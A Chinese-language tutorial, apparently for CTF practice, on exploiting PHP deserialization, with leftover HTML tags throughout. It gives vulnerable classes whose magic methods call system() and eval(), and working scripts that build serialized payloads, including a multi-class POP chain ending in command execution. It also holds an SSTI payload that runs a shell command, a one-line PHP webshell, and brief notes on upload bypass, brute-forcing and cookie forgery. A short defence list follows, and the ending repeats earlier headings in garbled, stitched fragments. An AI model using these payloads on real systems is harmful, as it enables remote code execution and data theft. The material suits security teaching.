PHP反序列化漏洞实战教学<\/h1>

1. 基础反序列化漏洞<\/h2>

1.1 基本原理<\/h3>
PHP反序列化漏洞发生在`unserialize()<\/code>函数处理用户可控数据时，攻击者可以构造恶意序列化数据来触发对象中的魔术方法，执行任意代码。<\/p>`

1.2 简单示例<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>class<\/span> A<\/span> {
<\/span><\/span>    public<\/span> $cmd;
<\/span><\/span>    function<\/span> __destruct() {
<\/span><\/span>        if<\/span> (isset<\/span>($this-><\/span>cmd<\/span>)) {
<\/span><\/span>            system<\/span>($this-><\/span>cmd<\/span>);
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>if<\/span> (isset<\/span>($_GET['data'<\/span>])) {
<\/span><\/span>    $data =<\/span> $_GET['data'<\/span>];
<\/span><\/span>    @<\/span>unserialize<\/span>($data);
<\/span><\/span>} else<\/span> {
<\/span><\/span>    highlight_file<\/span>(__FILE__<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>利用方法：<\/strong><\/p>

构造恶意对象<\/li>
序列化后作为参数传递<\/li>
<\/ol>
利用脚本：<\/strong><\/p>
<?<\/span>php<\/span>
<\/span><\/span>class<\/span> A<\/span> {
<\/span><\/span>    public<\/span> $cmd =<\/span> 'cat \/f*'<\/span>;
<\/span><\/span>}
<\/span><\/span>$obj =<\/span> new<\/span> A<\/span>();
<\/span><\/span>echo<\/span> urlencode<\/span>(serialize<\/span>($obj));
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>2. 复杂反序列化链构造<\/h2>
2.1 多级魔术方法调用<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>class<\/span> FlagReader<\/span> {
<\/span><\/span>    private<\/span> $logfile =<\/span> "\/tmp\/log.txt"<\/span>;
<\/span><\/span>    protected<\/span> $content =<\/span> "<?php system(<\/span>\$<\/span>_GET['cmd']); ?>"<\/span>;
<\/span><\/span>    
<\/span><\/span>    public<\/span> function<\/span> __toString() {
<\/span><\/span>        if<\/span> (file_exists<\/span>('\/flag'<\/span>)) {
<\/span><\/span>            return<\/span> file_get_contents<\/span>('\/flag'<\/span>);
<\/span><\/span>        } else<\/span> {
<\/span><\/span>            return<\/span> "Flag file not found!"<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> VulnerableClass<\/span> {
<\/span><\/span>    public<\/span> $logger;
<\/span><\/span>    private<\/span> $debugMode =<\/span> false<\/span>;
<\/span><\/span>    
<\/span><\/span>    public<\/span> function<\/span> __destruct() {
<\/span><\/span>        if<\/span> ($this-><\/span>debugMode<\/span>) {
<\/span><\/span>            echo<\/span> $this-><\/span>logger<\/span>;
<\/span><\/span>        } else<\/span> {
<\/span><\/span>            $this-><\/span>cleanup<\/span>();
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>利用步骤：<\/strong><\/p>

设置VulnerableClass<\/code>的私有属性$debugMode=true<\/code><\/li>
将$logger<\/code>设置为FlagReader<\/code>对象<\/li>
触发__destruct()<\/code>时会输出$logger<\/code>，调用__toString()<\/code><\/li>
<\/ol>
利用脚本：<\/strong><\/p>
<?<\/span>php<\/span>
<\/span><\/span>class<\/span> FlagReader<\/span> {
<\/span><\/span>    private<\/span> $logfile =<\/span> "\/tmp\/log.txt"<\/span>;
<\/span><\/span>    protected<\/span> $content =<\/span> "<?php system(<\/span>\$<\/span>_GET['cmd']); ?>"<\/span>;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> VulnerableClass<\/span> {
<\/span><\/span>    public<\/span> $logger;
<\/span><\/span>    private<\/span> $debugMode =<\/span> false<\/span>;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>$flag =<\/span> new<\/span> FlagReader<\/span>();
<\/span><\/span>$vuln =<\/span> new<\/span> VulnerableClass<\/span>();
<\/span><\/span>
<\/span><\/span>\/\/ 使用反射修改私有属性
<\/span><\/span><\/span><\/span>$ref =<\/span> new<\/span> ReflectionClass<\/span>($vuln);
<\/span><\/span>$debugMode =<\/span> $ref-><\/span>getProperty<\/span>('debugMode'<\/span>);
<\/span><\/span>$debugMode-><\/span>setAccessible<\/span>(true<\/span>);
<\/span><\/span>$debugMode-><\/span>setValue<\/span>($vuln, true<\/span>);
<\/span><\/span>
<\/span><\/span>$vuln-><\/span>logger<\/span> =<\/span> $flag;
<\/span><\/span>$payload =<\/span> serialize<\/span>($vuln);
<\/span><\/span>$base64_payload =<\/span> base64_encode<\/span>($payload);
<\/span><\/span>
<\/span><\/span>if<\/span> (preg_match<\/span>('\/^[a-zA-Z0-9\\/+]+={0,2}$\/'<\/span>, $base64_payload)) {
<\/span><\/span>    echo<\/span> "Payload: "<\/span>.<\/span>$base64_payload;
<\/span><\/span>}
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>3. 复杂调用链示例<\/h2>
<?<\/span>php<\/span>
<\/span><\/span>class<\/span> Read<\/span> {
<\/span><\/span>    public<\/span> $source;
<\/span><\/span>    public<\/span> $is;
<\/span><\/span>    
<\/span><\/span>    public<\/span> function<\/span> __toString() {
<\/span><\/span>        return<\/span> $this-><\/span>is<\/span>-><\/span>run<\/span>("Read"<\/span>);
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    public<\/span> function<\/span> __wakeup() {
<\/span><\/span>        echo<\/span> "Hello>>>"<\/span>.<\/span>$this-><\/span>source<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> Help<\/span> {
<\/span><\/span>    public<\/span> $source;
<\/span><\/span>    public<\/span> $str;
<\/span><\/span>    
<\/span><\/span>    public<\/span> function<\/span> Printf<\/span>($what) {
<\/span><\/span>        echo<\/span> "Hello>>>"<\/span>.<\/span>$what;
<\/span><\/span>        echo<\/span> "<br>"<\/span>;
<\/span><\/span>        return<\/span> $this-><\/span>str<\/span>-><\/span>source<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    public<\/span> function<\/span> __call($name, $arguments) {
<\/span><\/span>        $this-><\/span>Printf<\/span>($name);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> Polar<\/span> {
<\/span><\/span>    private<\/span> $var;
<\/span><\/span>    
<\/span><\/span>    public<\/span> function<\/span> getit<\/span>($value) {
<\/span><\/span>        eval<\/span>($value);
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    public<\/span> function<\/span> __invoke() {
<\/span><\/span>        $this-><\/span>getit<\/span>($this-><\/span>var<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> Doit<\/span> {
<\/span><\/span>    public<\/span> $is;
<\/span><\/span>    private<\/span> $source;
<\/span><\/span>    
<\/span><\/span>    public<\/span> function<\/span> __construct() {
<\/span><\/span>        $this-><\/span>is<\/span> =<\/span> array<\/span>();
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    public<\/span> function<\/span> __get($key) {
<\/span><\/span>        $vul =<\/span> $this-><\/span>is<\/span>;
<\/span><\/span>        return<\/span> $vul();
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>调用链分析：<\/strong><\/p>

触发Read::__wakeup()<\/code>输出$source<\/code>(另一个Read<\/code>对象)<\/li>
触发Read::__toString()<\/code>调用$is->run()<\/code>(实际为Help<\/code>对象)<\/li>
触发Help::__call()<\/code>调用Printf()<\/code><\/li>
访问$str->source<\/code>(Doit<\/code>对象)触发Doit::__get()<\/code><\/li>
__get()<\/code>执行$is()<\/code>(Polar<\/code>对象)触发Polar::__invoke()<\/code><\/li>
__invoke()<\/code>调用getit()<\/code>执行eval($this->var)<\/code><\/li>
<\/ol>
利用脚本：<\/strong><\/p>
<?<\/span>php<\/span>
<\/span><\/span>class<\/span> Read<\/span> { public<\/span> $source; public<\/span> $is; }
<\/span><\/span>class<\/span> Help<\/span> { public<\/span> $source; public<\/span> $str; }
<\/span><\/span>class<\/span> Polar<\/span> { private<\/span> $var; }
<\/span><\/span>class<\/span> Doit<\/span> { public<\/span> $is; private<\/span> $source; }
<\/span><\/span>
<\/span><\/span>\/\/ 构造利用链
<\/span><\/span><\/span><\/span>$polar =<\/span> new<\/span> Polar<\/span>();
<\/span><\/span>\/\/ 使用反射设置私有属性
<\/span><\/span><\/span><\/span>$reflection =<\/span> new<\/span> ReflectionClass<\/span>($polar);
<\/span><\/span>$property =<\/span> $reflection-><\/span>getProperty<\/span>('var'<\/span>);
<\/span><\/span>$property-><\/span>setAccessible<\/span>(true<\/span>);
<\/span><\/span>$property-><\/span>setValue<\/span>($polar, "system('env');"<\/span>); \/\/ 修改此处执行任意命令
<\/span><\/span><\/span><\/span>
<\/span><\/span>$doit =<\/span> new<\/span> Doit<\/span>();
<\/span><\/span>$doit-><\/span>is<\/span> =<\/span> $polar;
<\/span><\/span>
<\/span><\/span>$help =<\/span> new<\/span> Help<\/span>();
<\/span><\/span>$help-><\/span>str<\/span> =<\/span> $doit;
<\/span><\/span>
<\/span><\/span>$read2 =<\/span> new<\/span> Read<\/span>();
<\/span><\/span>$read2-><\/span>is<\/span> =<\/span> $help;
<\/span><\/span>
<\/span><\/span>$read1 =<\/span> new<\/span> Read<\/span>();
<\/span><\/span>$read1-><\/span>source<\/span> =<\/span> $read2;
<\/span><\/span>
<\/span><\/span>\/\/ 生成payload
<\/span><\/span><\/span><\/span>$payload =<\/span> serialize<\/span>($read1);
<\/span><\/span>echo<\/span> "Payload: "<\/span>.<\/span>urlencode<\/span>($payload);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>4. 其他相关技术<\/h2>
4.1 文件上传绕过<\/h3>
MIME类型验证绕过：<\/strong><\/p>

修改HTTP请求的Content-Type<\/code>头为image\/jpeg<\/code>等合法类型<\/li>
使用fileinfo<\/code>扩展检测真实MIME类型时，可以尝试在文件开头添加合法文件头<\/li>
<\/ul>
4.2 密码爆破<\/h3>
常见方法：<\/strong><\/p>

扫描目录获取密码本<\/li>
使用工具如Burp Suite或Hydra进行爆破<\/li>
常见弱密码尝试<\/li>
<\/ol>
4.3 SSTI (服务器端模板注入)<\/h3>
示例payload：<\/strong><\/p>
{{cycler.__init__.__globals__.os.popen('cat \/var\/secret_flag').read()}}
<\/code><\/pre>
4.4 Cookie伪造<\/h3>
常见方法：<\/strong><\/p>

扫描目录获取管理员登录页面<\/li>
将普通用户cookie中的用户信息改为admin<\/li>
使用base64编码伪造认证信息<\/li>
<\/ol>
5. 防御措施<\/h2>

避免反序列化用户输入<\/strong>：尽量不要反序列化用户提供的数据<\/li>
使用白名单<\/strong>：对反序列化的类进行限制<\/li>
签名验证<\/strong>：对序列化数据进行签名验证<\/li>
魔术方法审查<\/strong>：检查类中的魔术方法是否安全<\/li>
私有属性处理<\/strong>：注意反射可能绕过私有属性限制<\/li>
<\/ol>
6. 实用工具<\/h2>

PHPGGC<\/strong>：PHP反序列化payload生成工具<\/li>
Burp Suite<\/strong>：用于拦截和修改请求<\/li>
AntSword<\/strong>：中国蚁剑，Webshell管理工具<\/li>
Hydra<\/strong>：密码爆破工具<\/li>
DirBuster<\/strong>：目录扫描工具<\/li>
<\/ol>
通过以上技术点的学习和实践，可以全面掌握PHP反序列化漏洞的利用和防御方法。<\/p>
PHP反序列化漏洞实战教学<\/h1>

1. 基础反序列化漏洞<\/h2>

1.1 基本原理<\/h3> PHP反序列化漏洞发生在unserialize()<\/code>函数处理用户可控数据时，攻击者可以构造恶意序列化数据来触发对象中的魔术方法，执行任意代码。<\/p>

2. 复杂反序列化链构造<\/h2>

4. 其他相关技术<\/h2>

1.1 基本原理<\/h3>
PHP反序列化漏洞发生在`unserialize()<\/code>函数处理用户可控数据时，攻击者可以构造恶意序列化数据来触发对象中的魔术方法，执行任意代码。<\/p>`
